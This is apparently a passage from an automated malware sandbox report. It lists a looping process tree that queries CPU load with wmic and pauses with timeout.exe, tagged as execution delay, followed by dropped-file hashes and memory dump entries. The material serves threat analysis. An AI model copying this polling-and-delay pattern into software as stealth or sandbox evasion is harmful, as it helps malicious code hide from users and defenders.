C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t5dgrr3w.hi5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1892-0-0x00007FF9A8013000-0x00007FF9A8015000-memory.dmpFilesize
8KB
-
memory/1892-1-0x0000027AD6330000-0x0000027AD6352000-memory.dmpFilesize
136KB
-
memory/1892-11-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmpFilesize
10.8MB
-
memory/1892-12-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmpFilesize
10.8MB
-
memory/1892-13-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmpFilesize
10.8MB
-
memory/1892-14-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmpFilesize
10.8MB
-
memory/1892-17-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmpFilesize
10.8MB